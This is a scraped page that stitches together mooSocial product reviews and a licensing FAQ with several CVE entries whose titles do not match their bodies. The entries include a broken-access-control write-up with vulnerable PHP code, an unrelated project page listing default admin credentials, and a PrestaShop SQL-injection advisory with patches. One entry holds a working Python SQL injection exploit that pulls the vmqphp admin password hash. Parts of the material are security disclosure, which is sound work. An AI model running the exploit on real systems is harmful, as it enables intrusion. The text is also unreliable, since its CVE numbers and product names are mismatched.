We had tried many platforms including JomSocial, Dolphin.Pro, And Users Ultra before finding MooSocial. Let me just say that MooSocial is the absolute BEST social networking platform we've seen. The platform is great, the staff are helpful, and the community is helpful.

Reviewed by Jordan Dawson

**Very great powerful script for social network**

i used to be with oxwall until i bumped into moo social its got so much more great stuff that wow,ed me the support has been great and moosocial is so much awesome :) keep up the great work

Reviewed by snitch567

**Best script, ready made social site**

I searched years for a good script, tried many out there, ans spent hard earned money looking for a great script to have a small social site. I was ready to quit, then happened across moosocial. It was a dream come true. You don't have to be a coder to have a great light script.

Reviewed by Mikailah

**5 stars!**

Awesome script and best social network script out there period. I dont see no bugs and installation was so simple. Great support too!

Reviewed by julz

**Showcases**

*   
*   
*   
*   

**Spice up your networks with these Add-ons and Turnkey Solutions**

*   
*   
*   
*   
*   
*   

MORE ADD-ONS

**F.A.Q**

*   Frequently Asked Questions
*   More FAQs

**Does your license expire?**

No, mooSocial License does not exprie. It is a perpetual license and you can use our software indeﬁnitely.

**Will I be able to download updates in the future if I buy now?**

Yes, all updates are free to download as long as your software update subscription is active. Each license includes a 12 months update subscription.

**What happens after my update subscription expires?**

You can renew your update subscription for a minimal cost. Otherwise, you can continue using the software on your site.

**How much does it cost to renew my update subscription?**

$49 for every 12 months.

**Is the source code encrypted?**

No, you have 100% access to the source code.

**Can I modify the software to meet my requirements?**

Yes, you can do whatever modifications that you wish.

**Do I need to have any mooSocial branding on my site?**

Absolutely not. Unlike other prodducts, we do not force you to have our branding on your site

**Do you offer custom service?**

Yes, we do provide custom theme & development service. Please contact us for more details

**What payment methods do you accept?**

Currently, we accept Paypal, Visa/Master card (via Paypal), Western Union and MoneyGram

**Is it easy to translate the software?**

Yes, very easy. All the language strings are in a single language file. You can also install a third party software to make your translation even easier.

**What are the server requirements?**

Minimum:

*   PHP 5.4+
*   MySQL 5+
*   PHP extensions: MySql PDO, GD2, Curl, libxml, exif, zlib (if you need to export theme)
*   Magic quotes must be disabled
*   Memory Limit: 128M+

Recommended:

*   Apache server with mod\_rewrite

**Do I have to pay extra to remove any mentions of mooSocial?**

No, absolutely not.

**Do you offer an installation of upgrades?**

We do offer an upgrade installation service, the cost of the upgrading service will depend on how many hours we need to spend to re-apply any customizations you've made so far.

**How many users can mooSocial support?**

It is primarily dependent on the capabilities of your server. On shared hosting, mooSocial be able to support tens of thousands of users, while a single dedicated server can usually support upwards of one hundred thousand however we make no guarantee of performance due to the many variables involved. For each case of servers, we need to analyze to optimize if it problem happened.

**How soon will I receive my download information after purchasing?**

You will receive your download information very shortly after purchase..

**Is my billing information kept private when I purchase?**

Absolutely. In fact, we never see or store your billing information on our servers. Your information is processed via paypal secure payment gateway.

**How many licenses do I need?**

Each license is valid for a single public installation of the software, regardless of domains. You are of course welcome to create a private copy for development purposes.

**Do I need more than one license if i'm installing mooSocial on several subdomains/directories?**

Yes, every installation of mooSocial requires a license. However, you are entitled to create a second private installation for development purposes provided it's not publicly accessible.

**If I upgrade to a new version, will I lose my customizations or admin panel settings?**

This depends on what type of customizations you've made. If you've simply created new files and linked to them from mooSocial, it's unlikely that you will lose any customizations you've made. If you've edited the core code and you overwrite it with the new files from the upgrade package, you may lose your customizations. To avoid this, please make sure you full backup before upgrading, use compare tool to compare and merge changes that you made into the new core code. We do provide upgrading service so that contact us if you’re not sure what you should do.

**Do you offer trial version?**

Yes, Please download at https://moosocial.com/free-trial-download/

**Can I redistribute or resell mooSocial?**

No, you are not allowed to redistribute or resell mooSocial in any way.

**Can I extend my support service?**

Yes, support service can be purchased for $39/month.

**Can mooSocial be installed in a subdirectory or subdomain?**

Yes,You can install it on any location on your server.

**Can I Try Before I Buy?**

Please download it here https://moosocial.com/free-trial-download/

**Will I lose all my users if I upgrade?**

All user data and settings will be retained after upgrading. Make sure you full backup your site before upgrading.

**Do I get support with my purchase?**

After purchasing a license, you will receive a 30 days FREE support service via our ticket system, online chat or client community at http://community.moosocial.com/

**What type of issues does support cover?**

Our support team will assist with initial Software installation, general questions related to the script and technical errors encountered during the normal use of unmodified script. We cannot assist with customization of the script.

**How long do I get support after purchase?**

Up to 60 days of support

**How long does it take to get a response from support?**

Response times vary based on ticket volume but we do our best to respond to all tickets within several hours during business hours, or the next business day if submitted during off hours.

**Can I sell my website in the future?**

Yes, you're free to sell your website but not your mooSocial license since the licenses are non-transferable. In other words, if you choose to sell your website which contains a mooSocial license on it, the new owner would need to purchase their own license. What many clients do is simply incorporate the cost of the new license into the sale price of the website and purchase a new license on behalf of the new owner.

**Can I hire mooSocial to write custom plugins/customizations?**

Yes, we’re happy to help.

**I don't have a domain yet. Can I still purchase mooSocial?**

Yes! You can purchase mooSocial now and update your registered domain name later.











**

CVE-2023-43326: mooSocial - PHP Social Networking Software

An issue in Service Provider Management System v.1.0 allows a remote attacker to gain privileges via the ID parameter in the /php-spms/admin/?page=user/ endpoint.

**About the Application**

This Service Provider Management System v.1.0 is a sort of Content Management System (CMS) that is built specifically for companies that provide different services. The project is a company website that allows the management to dynamically manage the site information and other data on the front end. This project has 2 modules which are the Public and Management site.

The Management Site is the side of the system where accessible to the company staff or system-registered users only. On this site, users are required to log in with their valid system credentials to gain access to the features and functionalities. Users have 2 different roles which are the Administrator and the Staff. The Administrator users have the privilege to manage and access all the features and functionalities of the said site while the Staff users only have limited permissions. Here, system users can manage the list of services that their company provided. They can also update the dynamic page content of the public website on this side.

**Vulnerability Description**

Privilege Escalation in Service Provider Management System v.1.0 allows a remote attacker to gain privileges via the ID parameter in the /php-spms/admin/?page=user/manage_user&id=9 endpoint.

**Vulnerable Code**

**Filename:** /php-spms/admin/user/manage_user.php

**Vulnerable Endpoint:** /php-spms/admin/?page=user/manage_user&id=9

**Vulnerable Parameter:** id

**Code:**

1
2
3
4
5
6
7
8
9
10
11
12

<?php 
if(isset($_GET['id'])){
    $user = $conn->query("SELECT * FROM users where id ='{$_GET['id']}' ");
    foreach($user->fetch_array() as $k =>$v){
        $meta[$k] = $v;
    }
}
?>
<?php if($_settings->chk_flashdata('success')): ?>
<script>
	alert_toast("<?php echo $_settings->flashdata('success') ?>",'success')
</script>

The code checks if the id parameter is set in the URL but does not verify whether the authenticated user has the appropriate permissions to access the user data associated with that id. It assumes that anyone with the id parameter can access any user’s information. This oversight creates a security vulnerability known as ‘Broken Access Control (BAC), especially concerning the id parameters.

Broken Access Control is a security vulnerability in web applications and systems where proper access controls are not enforced, allowing unauthorized users to gain access to resources, perform actions they shouldn’t, or manipulate the system in unintended ways. Examples include inadequate authorization checks, missing authentication, direct object reference, overly permissive permissions, and failure to revoke access. To mitigate this issue, applications should implement strong access controls, enforce authentication and authorization rigorously, follow least privilege principles, and regularly test for and address potential access control problems.

**Impact of Broken Access Control**

The exact reasons for the impact of broken access control in a web application or system include:

**Unauthorized Access**: Broken access control allows unauthorized users to gain access to resources and functionality that should be restricted to certain users or roles.

**Data Exposure**: When access controls are not properly enforced, sensitive data can be exposed to users who shouldn’t have access, leading to data leaks and breaches.

**Data Manipulation**: Attackers can alter, delete, or insert data into the system, potentially causing data corruption and fraudulent activities.

**Attack Scenario**

*   Go to http://localhost/php-spms/admin/?page=user/list and create 2 user, alice as administrator and bob as staff.

_User creation_

*   Let’s view both user and notice the id assigned to each user.

_User id of both user_

*   Let’s login as bob who is a staff and visit the URL http://localhost/php-spms/admin/?page=user/manage_user&id=12

_Logged in as bob_

*   Let’s change the id value from 12->11 and see if we can access the details of user alice.

_Alice’s detail is accessible by bob_

*   We can able to view the information of alice, let’s try to change the password of alice.

_Alice’s password is changed_

Remediating broken access control vulnerabilities is crucial to secure your web application or system. To address these vulnerabilities effectively, follow these remediation steps:

**Implement Proper Authentication and Authorization**: Ensure that your application uses strong authentication mechanisms to verify user identities. Use multi-factor authentication (MFA) for added security. Implement fine-grained authorization controls based on user roles and privileges. Users should only have access to resources and actions they are authorized to use.

**Access Control Lists (ACLs) or Role-Based Access Control (RBAC)**: Implement ACLs or RBAC to define and manage access permissions for users and resources. This helps maintain a clear and structured access control policy.

**Secure Session Management**: Implement secure session management to ensure that session tokens are generated securely, invalidated after logout or inactivity, and protected against session fixation attacks.

That’s all in this writeup.

Thanks for reading this far. If you enjoyed the writeup, do support me **here**.

CVE-2023-43457: CVE-2023-43457 - Broken Access Control (BAC)

szvone vmqphp <=1.13 is vulnerable to SQL Injection. Unauthorized remote users can use sql injection attacks to obtain the hash of the administrator password.

import requests

import re

import hashlib

import time

url \= "http://127.0.0.1:887" \# target ip

payload1 \= "/index/index/closeOrder?orderId\[123\]=123"

res \= requests.get(url \= url + payload1)

r \= re.findall('\\'key\\' => \\'<a class="toggle" title="(.\*?)"\\>', res.text) \# to get hash key

key \= r\[0\]

print(key)

payId \= 'hello5' \# Enter any one

mytype \= "1e0'-updatexml(1,concat(0x7e,user(),0x7e,version(),0x7e),3)-'1" #SQL statements injected with errors

price \= '1100' #It is best to write an integer of 100, and it cannot be repeated with the previous

byte\_sign \= (payId + mytype + price + key).encode(encoding\='utf-8')

sign \= hashlib.md5(byte\_sign).hexdigest()

payload2 \= "/createOrder?payId="+payId+"&type="+mytype+"&price="+price+"&sign="+sign

print(url+payload2) #Get the payload and access it directly in the browser

CVE-2023-43132: test

Cross Site Scripting (XSS) vulnerability in Resort Reservation System v.1.0 allows a remote attacker to execute arbitrary code and obtain sensitive information via the room, name, and description parameters in the manage_room function.

Submitted by oretnom23 on Saturday, April 15, 2023 - 15:51.

This simple project is entitled **Resort Reservation System**. It is a simple web application that provides an automated platform for certain resort management to easily store and retrieve reservation records. It was mainly developed using **PHP Language** and **SQLite3 Database**. It has a simple and pleasant user interface using **Bootstrap v5 Framework**. The project contains **CRUD** _(Create, Read, Update, and Delete)_ Operations and user-friendly features and functionalities.

****How does the Resort Reservation System work?****

This **Resort Reservation System** was mainly developed and can only be accessed by the resort management. Here, resort management can dynamically list all the rooms/cottages and extra fees that are available at their resort. They can simply encode or store their customer reservation records along with some other charges. Using the system, users can encode first the customer reservation details and the room or cottage they wanted to take and add extra fees or charges when the customer checked in.

****Features and Functionalities****

This **Resort Reservation System** project contains the following features and functionalities:

*   **Login and Logout**
*   **Room/Cottage Management**
    *   **Add New Room/Cottage**
    *   **List All Rooms/Cottages**
    *   **Update Room/Cottage Details**
    *   **View Room/Cottage Details**
    *   **Delete Room/Cottage**
*   **Extra Fee Management**
    *   **Add New Extra Fee**
    *   **List All Extra Fees**
    *   **Update Extra Fee Details**
    *   **View Extra Fee Details**
    *   **Delete Extra Fee**
*   **Reservation Management**
    *   **Add New Reservation**
    *   **List All Reservation**
    *   **Update Reservation Details**
    *   **View Reservation Details**
    *   **Delete Reservation**
*   **User Management**
    *   **Add New User**
    *   **List All Users**
    *   **Update User Details**
    *   **View User Details**
    *   **Delete User**

****Technologies****

This **Resort Reservation System** was developed using the following technologies:

*   **XAMPP**
*   **VS Code Editor**
*   **HTML**
*   **CSS**
*   **PHP**
*   **SQLite3**
*   **JavaScript**
*   **jQuery**
*   **Ajax Request**
*   **Bootstrap Framework**
*   **Google Icons**

****Snapshots****

Here are some snapshots of some pages of this **Resort Reservation System**:

****Login Page****

****Home Page****

****Room and Cottages List****

****Extra Fees List****

****Reservation List****

****Reservation Details****

The **Resort Reservation System** project complete source code zip file is available on this website and is free to download. Feel free to download and modify the source code the way you desire. The project was mainly developed for educational purposes only and not commercially.

****How to Run****

**Requirements**

*   **Download** and **Install** any **local web server** such as **XAMPP/WAMP.**
*   **Download** the provided source code **zip** file. (_download button is located below_)

**Installation/Setup**

1.  Open your XAMPP/WAMP php.ini file and uncomment the **sqlite3** **extension**. Then, save the file.
3.  **Open** your **XAMPP/WAMP's Control Panel** and start ****Apache****.
4.  **Extract** the **downloaded source code **zip** file**.
5.  If you are using **XAMPP**, **copy** the extracted source code folder and **paste** it into the **XAMPP's "htdocs" directory**. And If you are using **WAMP**, **paste** it into the **"www" directory.**
6.  **Browse** the **Resort Reservation System** in a **browser**. i.e. ****http://localhost/php-sqlite-cqs/****.

****Default Admin Access****

Username: **admin**  
Password: **sourcecodester&123**

That's it! I hope this **Resort Reservation System in PHP and SQLite3 Source Code** will help you with what you are looking for and that you'll find something useful for your current and future **PHP Projects**.

Explore more on this website for more **Tutorials** and **Free Source Codes**.

****Enjoy =)****

*   4485 views

CVE-2023-43458: Resort Reservation System in PHP and SQLite3 Source Code Free Download

UpLight cookiebanner before 1.5.1 was discovered to contain a SQL injection vulnerability via the component Hook::getHookModuleExecList().

**IMPORTANT NOTICE**: DO NOT REPORT VULNERABILITIES SOLELY TO THE AUTHOR OR MARKETPLACE.

We urge you to report any vulnerabilities directly to us. Our mission is to ensure the safety and security of the PrestaShop ecosystem. Unfortunately, many module developers may not always recognize or acknowledge the vulnerabilities in their code, whether due to lack of awareness, or inability to properly evaluate the associated risk, or other reasons.

Given the rise in professional cybercrime networks actively seeking out these vulnerabilities, it's crucial that any potential threats are promptly addressed and the community is informed. The most effective method to do this is by publishing a CVE, like the one provided below.

Should you discover any vulnerabilities, **please report them to us at: report\[@\]security-presta.org**.

Every vulnerability report helps make the community more secure, and we are profoundly grateful for any information shared with us.

In the module “Cookie Law - Banner + Cookie blocker” (cookiebanner) up to version 1.5.0 from UpLight for PrestaShop, a guest can perform SQL injection in affected versions.

**Summary**

*   **CVE ID**: CVE-2023-39640
*   **Published at**: 2023-09-21
*   **Advisory source**: Friends-Of-Presta.org
*   **Platform**: PrestaShop
*   **Product**: cookiebanner
*   **Impacted release**: <= 1.5.0 (1.5.1 fixed the vulnerability)
*   **Product author**: UpLight
*   **Weakness**: CWE-89
*   **Severity**: critical (9.8)

**Description**

The method Hook::getHookModuleExecList() inside an override of the module has sensitive SQL calls that can be executed with a trivial http call and exploited to forge a SQL injection.

This exploit uses a PrestaShop front controller and most attackers can conceal the module controller’s path during the exploit, so you will never know within your conventional frontend logs that it exploits this vulnerability. **You will only see “POST /” inside your conventional frontend logs.** Activating the AuditEngine of mod\_security (or similar) is the only way to get data to confirm this exploit.

**CVSS base metrics**

*   **Attack vector**: network
*   **Attack complexity**: low
*   **Privilege required**: low
*   **User interaction**: none
*   **Scope**: unchanged
*   **Confidentiality**: high
*   **Integrity**: high
*   **Availability**: high

**Vector string**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Possible malicious usage**

*   Obtain admin access
*   Remove data from the associated PrestaShop
*   Copy/paste data from sensitive tables to FRONT to expose tokens and unlock admins’s ajax scripts
*   Rewrite SMTP settings to hijack emails

**Patch from 1.4.5 and 1.5.0**

    --- 1.4.5/modules/cookiebanner/controllers/front/settings.php
    +++ XXXXX/modules/cookiebanner/controllers/front/settings.php
    ...
            } elseif (Tools::isSubmit('submitSettings')) {
                $module_list = Tools::getValue('module_list');
                $disabled_modules_list = array();
                if (is_array($module_list)) {
                    foreach ($module_list as $id_module => $authorized) {
                        if (!$authorized) {
    -                       $disabled_modules_list[] = $id_module;
    +                       $disabled_modules_list[] = (int) $id_module;
                        }
                    }
                } else {
                    $this->errors[] = $this->l('No modules selected!');
                }
    

    --- 1.4.5/modules/cookiebanner/override/classes/Hook.php
    +++ XXXXX/modules/cookiebanner/override/classes/Hook.php
    ...
                if (count($disabled_modules_list)) {
    -               $sql->where('m.`id_module` NOT IN ('.implode(',', $disabled_modules_list).')');
    +               $sql->where('m.`id_module` NOT IN ('.implode(',', array_map('intval', $disabled_modules_list)).')');
                }
    

    --- 1.5.0/modules/cookiebanner/override/classes/Hook.php
    +++ XXXXX/modules/cookiebanner/override/classes/Hook.php
    ...
            if (!empty(self::$disabledHookModules)) {
    -           $sql->where('m.id_module NOT IN (' . implode(', ', self::$disabledHookModules) . ')');
    +           $sql->where('m.`id_module` NOT IN ('.implode(',', array_map('intval', self::$disabledHookModules)).')');
            }
    

**WARNING : Be warned that you must check the hook installed here** :

    --- 1.4.5/override/classes/Hook.php
    +++ XXXXX/override/classes/Hook.php
    ...
                if (count($disabled_modules_list)) {
    -               $sql->where('m.`id_module` NOT IN ('.implode(',', $disabled_modules_list).')');
    +               $sql->where('m.`id_module` NOT IN ('.implode(',', array_map('intval', $disabled_modules_list)).')');
                }
    

    --- 1.5.0/override/classes/Hook.php
    +++ XXXXX/override/classes/Hook.php
    ...
            if (!empty(self::$disabledHookModules)) {
    -           $sql->where('m.id_module NOT IN (' . implode(', ', self::$disabledHookModules) . ')');
    +           $sql->where('m.`id_module` NOT IN ('.implode(',', array_map('intval', self::$disabledHookModules)).')');
            }
    

**Other recommendations**

*   It’s recommended to upgrade to the latest version of the module **cookiebanner**.
*   Upgrade PrestaShop to the latest version to disable multiquery executions (separated by “;”) - be warned that this functionality **WILL NOT** protect your SHOP against injection SQL which uses the UNION clause to steal data.
*   Change the default database prefix ps_ with a new longer, arbitrary prefix. Nevertheless, be warned that this is useless against blackhats with DBA senior skill because of a design vulnerability in DBMS
*   Activate OWASP 942’s rules on your WAF (Web application firewall), be warned that you will probably break your backoffice and you will need to pre-configure some bypasses against this set of rules.

**Timeline**

Date

Action

2023-05-24

Issue discovered during a code review by TouchWeb.fr

2023-05-24

Contact PrestaShop Addons security Team to confirm versions scope by author

2023-05-26

PrestaShop Addons security Team confirm versions scope

2023-07-25

Request a CVE ID

2023-08-25

Received CVE ID

2023-09-21

Publish this security advisory

**Links**

*   PrestaShop addons product page
*   National Vulnerability Database

**DISCLAIMER:** _The French Association Friends Of Presta (FOP) acts as an intermediary to help hosting this advisory. While we strive to ensure the information and advice provided are accurate, FOP cannot be held liable for any consequences arising from reported vulnerabilities or any subsequent actions taken._

Tag

#php